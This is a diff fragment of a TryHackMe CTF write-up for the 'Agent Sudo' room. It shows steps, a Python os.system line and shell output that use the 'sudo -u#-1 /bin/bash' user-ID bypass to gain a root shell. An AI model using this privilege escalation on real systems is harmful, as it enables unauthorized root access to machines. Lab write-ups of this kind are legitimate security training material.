JonmarCorpuz/Writeups/TryHackMe CTF Writeups/Agent Sudo (Easy).md

 os.system("sudo -u#-1 "+ binary)
 ```
-44. `sudo -u#-1 /bin/bash`
+47. `sudo -u#-1 /bin/bash` to run a Bash shell with the user ID -1
-45. `whoami` to verify if we're running as root, which we are
+48. `whoami` to verify if we're running as root, which we are
 ```bash
 james@agent-sudo:~$ sudo -u#-1 /bin/bash
 root@agent-sudo:~#